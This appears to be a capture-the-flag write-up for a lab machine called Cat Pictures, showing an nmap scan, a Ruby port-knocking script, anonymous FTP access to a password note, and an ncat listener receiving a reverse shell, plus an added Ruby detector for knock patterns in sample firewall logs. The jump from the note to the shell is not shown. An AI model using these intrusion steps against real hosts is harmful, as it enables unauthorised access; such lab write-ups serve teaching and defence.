```
# Nmap 7.91 scan initiated Mon Jul 26 11:24:16 2021 as: nmap -sSVC -p- -oA nmap_full -v -T 4 10.10.39.43
Nmap scan report for 10.10.39.43
Host is up (0.031s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   filtered ftp
22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open     nvm-express?
| fingerprint-strings: 
|   DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|     Please enter password:
|     Invalid password...
|     Connection Closed
|   NULL, RPCCheck: 
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|_    Please enter password:
8080/tcp open     http         Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
```
We found an unusual service on port 4420; let's try to connect to it.
```
$ telnet catpictures.thm 4420
Trying 10.10.39.43...
Connected to 10.10.39.43.
Escape character is '^]'.
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
password
Invalid password...
Connection Closed
Connection closed by foreign host.
```
Right now we don't have credentials so let's try the web service instead.
We can look at Rubyfu to find out how to write a simple port-knocking script in Ruby.
```ruby
require 'socket'

# Knock sequence: the ports must be hit in this order
ports = [1111, 2222, 3333, 4444]

ports.each do |port|
  puts "[+] Port: #{port}"
  sleep 1
  begin
    # A plain TCP connect attempt is enough for a knock; the port is
    # expected to be closed or filtered, so the connection usually fails.
    s = TCPSocket.new '10.10.39.43', port
    s.close
  rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH
    next
  end
end
```
Now if we scan the ports again, we'll see the FTP port is open:
```
$ sudo nmap -sS 10.10.39.43 -p- -v -T 4
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
2375/tcp filtered docker
4420/tcp open     nvm-express
8080/tcp open     http-proxy
```
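Seen from the firewall on the target, the knock above is a short burst of dropped SYNs to a handful of distinct ports from one source, followed a moment later by an accepted connection to a port that was filtered until then (here 21). That pattern is what a defender can alert on. The script below is an added example, not code from the original writeup or from the room: it parses constructed netfilter-LOG-style lines (the `FW-DROP`/`FW-ACCEPT` prefixes, hostnames and the `10.9.1.x` source addresses are all made up for the sample) and flags sources whose drop burst is small, hits each port once, and is followed by an accepted connection to a port outside the burst. A full port scan produces far more distinct ports in the same window and is deliberately not matched here, so it can be handled by a separate scan-detection rule.

```ruby
# Constructed sample firewall log (netfilter LOG target style, prefixes
# FW-DROP / FW-ACCEPT assumed). Not taken from the original page.
# 10.9.1.50 knocks 1111,2222,3333,4444 and then gets 21 accepted;
# 10.9.1.77 is just two unrelated dropped probes minutes apart.
SAMPLE_LOG = <<~LOG
  Jul 26 11:30:01 gw kernel: FW-DROP IN=eth0 OUT= SRC=10.9.1.50 DST=10.10.39.43 PROTO=TCP SPT=51000 DPT=1111 SYN
  Jul 26 11:30:02 gw kernel: FW-DROP IN=eth0 OUT= SRC=10.9.1.50 DST=10.10.39.43 PROTO=TCP SPT=51001 DPT=2222 SYN
  Jul 26 11:30:03 gw kernel: FW-DROP IN=eth0 OUT= SRC=10.9.1.50 DST=10.10.39.43 PROTO=TCP SPT=51002 DPT=3333 SYN
  Jul 26 11:30:04 gw kernel: FW-DROP IN=eth0 OUT= SRC=10.9.1.50 DST=10.10.39.43 PROTO=TCP SPT=51003 DPT=4444 SYN
  Jul 26 11:30:06 gw kernel: FW-ACCEPT IN=eth0 OUT= SRC=10.9.1.50 DST=10.10.39.43 PROTO=TCP SPT=51004 DPT=21 SYN
  Jul 26 11:31:10 gw kernel: FW-DROP IN=eth0 OUT= SRC=10.9.1.77 DST=10.10.39.43 PROTO=TCP SPT=40000 DPT=8080 SYN
  Jul 26 11:40:00 gw kernel: FW-DROP IN=eth0 OUT= SRC=10.9.1.77 DST=10.10.39.43 PROTO=TCP SPT=40001 DPT=443 SYN
LOG

# Fields we need: time of day, firewall verdict, source address, destination port.
LINE_RE = /^(?<mon>\w{3}) +(?<day>\d+) (?<h>\d\d):(?<m>\d\d):(?<s>\d\d) \S+ kernel: FW-(?<action>DROP|ACCEPT) .*?SRC=(?<src>\S+) .*?DPT=(?<dport>\d+)/

Event = Struct.new(:t, :src, :dport, :action)

# Turn log text into Event records; lines that do not match are ignored.
def parse_events(log)
  log.each_line.map do |line|
    m = LINE_RE.match(line)
    next unless m
    # seconds since midnight is enough for a single-day sample
    t = m[:h].to_i * 3600 + m[:m].to_i * 60 + m[:s].to_i
    Event.new(t, m[:src], m[:dport].to_i, m[:action])
  end.compact
end

# Heuristic: a knock is a burst (within `window` seconds) of DROPped SYNs from
# one source to a few distinct ports, each hit exactly once, followed within
# `window` seconds by an ACCEPTed connection to a port outside the burst.
# Returns one alert per source, as a Hash.
def detect_knocks(events, window: 15, min_ports: 3, max_ports: 10)
  alerts = []
  events.group_by(&:src).each do |src, evs|
    evs = evs.sort_by(&:t)
    drops = evs.select { |e| e.action == 'DROP' }
    drops.each_with_index do |first, i|
      burst = drops[i..-1].take_while { |e| e.t - first.t <= window }
      ports = burst.map(&:dport)
      next unless ports.size.between?(min_ports, max_ports)
      next unless ports.uniq.size == ports.size          # each port knocked once
      last_t = burst.last.t
      opened = evs.find do |e|
        e.action == 'ACCEPT' && !ports.include?(e.dport) &&
          e.t > last_t && e.t - last_t <= window
      end
      alerts << { src: src, sequence: ports, then_accepted: opened && opened.dport }
      break # one alert per source is enough for triage
    end
  end
  alerts
end

# Convenience entry point used by the usage line below and by tests.
def knock_alerts(log = SAMPLE_LOG)
  detect_knocks(parse_events(log))
end

if __FILE__ == $PROGRAM_NAME
  knock_alerts.each do |a|
    puts "[!] #{a[:src]} knocked #{a[:sequence].join(',')} then got ACCEPT on #{a[:then_accepted] || 'nothing'}"
  end
end
```

Run against real netfilter logs you would adjust `LINE_RE` to your own `--log-prefix` and feed the file contents to `knock_alerts`; the `then_accepted` field is what separates a knock that actually opened something from a handful of stray probes, so alerts with `nil` there can be ranked lower.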
```
$ ftp catpictures.thm
Connected to catpictures.thm.
220 (vsFTPd 3.0.3)
Name (catpictures.thm:noraj): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 3,2e-05 seconds (4,83 Mbytes/s)
ftp> quit
221 Goodbye.
```
```
$ cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is s<edited>t.
- catlover
```
```
$ ncat -lvnp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.39.43.
Ncat: Connection from 10.10.39.43:38828.
bash: cannot set terminal process group (1609): Inappropriate ioctl for device
bash: no job control in this shell
I have no name!@cat-pictures:/# echo $SHELL
echo $SHELL
/bin/sh
I have no name!@cat-pictures:/# echo $TERM
echo $TERM
dumb
```